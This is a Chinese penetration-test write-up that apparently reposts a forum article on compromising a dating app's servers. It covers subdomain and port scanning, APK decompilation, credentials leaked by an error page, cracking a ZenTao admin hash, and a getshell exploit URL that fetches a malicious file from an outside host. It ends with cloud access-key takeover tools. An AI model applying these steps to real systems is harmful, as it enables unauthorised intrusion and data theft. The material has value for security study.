1。开局一张高端品质交友的邀请码讲起

解析二维码得到链接http://web.test.com/?invite_code=23K1GK

先收集子域名，顺便把app丢进模拟器和AndroidKiller(简单暴力)

收集子域名常用的工具subDomainsBrute、securitytrails.com、x.threatbook.cn

都只得到较少的域名，其中i.test.com为一个后台地址

拿到域名先对其进行简单的目录扫描(dirSearch),并未得到什么有用的东西

常规思路，先对app进行抓包

结果常用的真机(root+magisk)和模拟器都不能正常打开，此时AndroidKiller也反编译完成，先看看再说

其实在此步骤之前应该先用查壳工具，看看有没有加壳。(常用ApkScan-PKID查壳工具)，不过根据apk文件的目录结构可以简单判断是否加壳，后续发篇文章分享，这里，此交友软件并未加壳，此时用Ajadx打开

得到一个域名shine.test2.com（手动打开发现是TP框架，常规扫描和poc尝试后无果），顺便进行域名收集

在反编译的包中收集的信息并不多(一般我只进行信息收集，主要是不在行)，像注释掉的测试ip，域名等信息有时候就是渗透过程中的突破口

这里分享一个工具ApkAnalyser (https://github.com/TheKingOfDuck/ApkAnalyser)

二、处理test2.com域名及ip信息

test.com域名基本没戏，这里也是本文的突破口，subDomainsBrute域名扫描结果部分域名如下

端口扫描结果(常用masscan，nmap太慢了)

其他几个ip端口开放情况差不多，其中11306为mysql，16379为redis，11211为ftp，10022为ssh，常用爆破工具如下，个人习惯只简单爆破，主要针对redis和ftp，ssh和mysql一般都放弃爆破，小字典尝试

处理域名或者ip webcheck，找不到原作了，知道的朋友麻烦贴一下链接

其中cd.test2.com 为禅道系统，版本11.6，其他尝试了弱口令及公开的poc，无果

gm.test2.com报错，让我很惊喜，得到关键信息

得到redis，mysql，mongdb，elastic 口令，得到口令后先对redis进行了尝试，发现密码错误，可能是测试服的原因，随即连接mysql，发现有禅道的库，对管理员MD5进行解密，人品比较好，解得开

 

 

 

进入后台，就是如何getshell了

通过搜索，大多数后台getshell的方法都是这个https://www.secpulse.com/archives/146782.html

怎奈这个exp，且都是通过ftp下载shell，多次复现均不成功

 

再次搜索发现这篇文章https://blog.csdn.net/qq_36197704/article/details/109385695

利用文章poc2 得到shell

exp2：index.php?m=client&f=download&version=[$version参数]&link=[ base64加密后的恶意文件地址]

 

三、拿到shell后就是提权

还是对配置文件等进行简单的信息收集，其中上传处得到

丢到工具去，一把梭哈，提权什么的也就不需要了

 

工具链接：https://github.com/shack2/SNETCracker

字典的话推荐一下这个：https://github.com/TheKingOfDuck/fuzzDicts

阿里云工具：https://github.com/mrknow001/aliyun-accesskey-Tools

 

文字作者：nansec

原文地址：https://www.t00ls.net/thread-62575-3-1.html